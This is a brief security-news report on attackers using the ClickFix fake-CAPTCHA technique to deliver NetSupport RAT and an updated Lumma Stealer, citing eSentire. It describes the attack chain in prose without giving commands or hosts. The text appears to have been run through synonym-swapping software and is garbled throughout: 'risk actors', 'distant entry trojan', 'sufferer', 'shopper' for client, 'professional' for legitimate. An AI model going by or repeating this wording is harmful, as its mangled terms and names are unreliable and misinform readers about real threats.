Risk actors have noticed the more and more frequent ClickFix method to ship a distant entry trojan named NetSupport RAT since early January 2025.
NetSupport RAT, sometimes propagated by way of bogus web sites and pretend browser updates, grants attackers full management over the sufferer’s host, permitting them to observe the system’s display in real-time, management the keyboard and mouse, add and obtain information, and launch and execute malicious instructions.
Initially referred to as NetSupport Supervisor, it was developed as a professional distant IT assist program, however has since been repurposed by malicious actors to focus on organizations and seize delicate data, together with screenshots, audio, video, and information.
“ClickFix is a way utilized by risk actors to inject a faux CAPTCHA webpage on compromised web sites, instructing customers to comply with sure steps to repeat and execute malicious PowerShell instructions on their host to obtain and run malware payloads,” eSentire stated in an evaluation.
Within the assault chains recognized by the cybersecurity firm, the PowerShell command is used to obtain and execute the NetSupport RAT shopper from a distant server that hosts the malicious parts within the type of PNG picture information.
The event comes because the ClickFix method can also be getting used to propagate an up to date model of the Lumma Stealer malware that makes use of the ChaCha20 cipher for decrypting a configuration file containing the checklist of command-and-control (C2) servers.
“These adjustments present perception into the evasive techniques employed by the developer(s) who’re actively working to bypass present extraction and evaluation instruments,” eSentire stated.